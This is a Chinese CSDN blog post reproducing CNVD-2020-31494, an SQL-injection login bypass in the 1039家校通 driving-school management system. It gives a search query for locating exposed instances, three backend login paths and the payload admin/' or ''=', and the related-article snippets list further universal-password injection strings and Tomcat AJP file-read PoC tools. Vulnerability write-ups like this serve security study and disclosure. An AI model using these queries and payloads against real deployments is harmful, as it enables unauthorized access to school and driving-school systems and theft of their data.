1039家校通 万能密码绕过 CNVD-2020-31494

最新推荐文章于 2023-08-18 20:07:29 发布
最新推荐文章于 2023-08-18 20:07:29 发布
阅读量881 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DUANYU23/article/details/119251316
版权

1039家校通 万能密码绕过 CNVD-2020-31494

0X001前言

北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。

0X002 漏洞影响

系统存在万能密码(sql注入)绕过漏洞,攻击者可利用该漏洞获取数据库信息。

0X003 漏洞原理

未过滤参数从而存在登陆绕过。

0X004 漏洞复现

0X041 空间搜索寻找目标

搜索语法:title="学员登录_1039家校通"

在这里插入图片描述

0X041 万能密码登陆

后端登陆路径三个
/admin/Product/Comstye.aspx
/Student/StudentLogin.aspx
/Teacher/Index.aspx

首页点击教师登陆。
在这里插入图片描述

输入用户名密码admin/’ or ‘’=’,登陆成功。

在这里插入图片描述

万能密码漏洞
Coisini的博客
06-15 1万+
本来都不打算讲这个漏洞的(感觉太low了),但是在最近的一次渗透测试中,居然发现了这个漏洞,而且还是政府的网站……所以还是打算讲一下吧 最近在一次爬网站地址时,发现了这个登录界面,随手输入了一个万能密码,没想到居然进去了 漏洞原理: 网站把密码放到数据库中,在登陆验证中一般都用以下sql查询语句去查找数据库 sql=select * from user where username=’use...
万能密码破解
01-07
万能密码破解,工具说明内有详情,具体更新可能存在兼容系性,利用管理员权限
saucer-man#wiki#1039家校通 万能密码绕过 CNVD-2020-314941
07-25
1039家校通 万能密码绕过 CNVD-2020-31494漏洞描述北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生
表单绕过万能密码
weixin_65467603的博客
03-14 165
3.输入 用户名,密码任意。2.找到目标地址并进入。
登陆界面万能密码绕过
1stPeak's Blog
08-12 3601
常见万能密码: admin'-- admin' or ''=''-- admin' or 1=1-- 'or 1=1-- admin'or''=' 'or'='or' 'or''='
表单绕过实验万能密码
aliu555的博客
03-14 634
那么我们在看这条语句,就相当于只需要满足use的值为空,或者是1=1和pwd等于’123‘。我们理解这条是查询数据库中表名为tb_admin中的use列,并且查询需要满足的条件是use列中值为“11”而且还要pwd列值为“123”的数据信息。万能密码的用户名和密码: admin or 1=1 或者1 or 1=1 or 1=1这个的原理就是利用了数据库在查询过程中的代码漏洞造成的。通常我们会使用这种方法来验证网页上用户输入的账号和密码,如果是有这条信息的则出现另一个登录成功。这是一个普通的查询语句。
绕过登录的万能密码 SQL 注入
MachineGunJoe666
08-18 805
如果遇到防护较低的应用程序,在这个时候利用注释的方法,让查询帐号的结果返回真,忽略掉密码部分,即万能密码登录系统。正常一个没有防护的应用程序,允许用户使用用户名和密码登录。如果查询返回用户的详细信息,则登录成功。如果查询的时候让账号为真并且忽略掉后面的内容,根据。用户身份登录到应用程序的 SQL 注入攻击。从总体来看,根据提示需要关注的是登录功能点。,而应用程序根据返回为真的情况允许用户登录。的用户,并成功将攻击者登录到该用户。可以确定的是账号和密码处是可控的。根据提示,需要登录的账号是。
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
CNVD-2020-10487.7z
09-19
标题中的"CNVD-2020-10487.7z"是指中国国家信息安全漏洞库(China National Vulnerability Database,简称CNVD)在2020年记录的一个编号为CNVD-2020-10487的安全漏洞。这个漏洞主要涉及到Apache Tomcat服务器,而...
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -...
家校通系统(学校管理系统) v1.0 试用版.rar
07-09
家校通系统采用PHP MYSQL开发的一套具有方便、快速、安全、高效的学校管理系统。本系统功能完备、使用方便快捷,已在全国超过100所中小学校成功应用,并得到了多方一致好评。本系统分为公司管理系统、学校管理系统、老师管理系统、家长管理系统,可自行发布,自主运营。系统安全稳定运行。 家校通系统功能简介: 1. 公司管理系统:系统前台设置,系统参数配置,数据库操作,学校管理,家长账户管理,系统功能开关,系统信息管理,家校通开通关闭设置。 2. 学校管理系统:校务管理(站内信开关,留言板开关,考试类型设置,科目设置,考勤信息,班级管理),人员管理(主要管理学校老师以及学校管理员),公告管理(发布学校公告)。 3. 老师管理系统:主界面,考试管理,作业管理,班务管理,评语管理,考勤管理,个人信息,站内信 4. 家长管理系统:班级主界面、考勤统计、成绩统计、作业查询、老师评语查询、课程表、站内信、个人信息。 商业版联系QQ:70020765
互动电视平台建设方案
10-11
未来电视信息传输方式,“加强宽带通信网、数字电视网、下一代互联网等基础设施建设,推进‘三网融合’,健全信息安全保障体系。”
TRS WAS 5.0 安装手册
08-20
TRS WAS 5.0 安装手册
TRS WAS 5.0 用户手册
07-20
TRS WAS 5.0 用户手册,详细介绍
技术分享 | 某家校通渗透测试 漏洞合集
hacker5643的博客
09-19 517
原创: Z1h52 白帽子社区 本文由Z1h52向白帽子社区投稿 转载请附上本文链接 介绍 ​ 北京壹零叁玖科技发展有限公司(简称1039公司)是国内第一家专业从事培训行业标准化软件开发和大型应用性平台的高科技企业,是培训行业信息化建设的最佳合作伙伴。 1039家校通网上约车系统是一款驾校一体化系统。 漏洞利用 SQL注入万能密码 影响版本: 家校通v1.0 - v.6.0 登录接口 /ad...
1039家校通SQL注入获取管理员权限
梦里明明有六趣,觉后空空无大千
07-14 281
我们承认伟人在历史过程中的贡献。可人类生活的大厦从本质上说,是由无数普通人的血汗乃至生命所建造的。伟人们常常企图用纪念碑或纪念堂来使自己永世流芳。真正万古长青的却是普通人的无人纪念碑——生生不息的人类生活自身。是的,生活之树常青。
Mysql漏洞注入——万能密码
qq_66985187的博客
03-14 1183
万能密码,mysql绕过验证和web渗透测试
php 万能密码,万能密码漏洞利用
weixin_29726381的博客
03-11 693
【脚本漏洞】所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。自己也有过收集,别人总结的我又添加了几个asp aspx万能密码1:”or “a”=”a2: ‘)or(‘a’=’a3:or 1=1–4:’or 1=1–5:a’or’ 1=1–6:”or 1=1–7:’or’a’=’a8:”or”=”a’=’a9:’or”=’10:’or...
cnvd-2020-10487-tomcat-ajp-lfi
最新发布
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值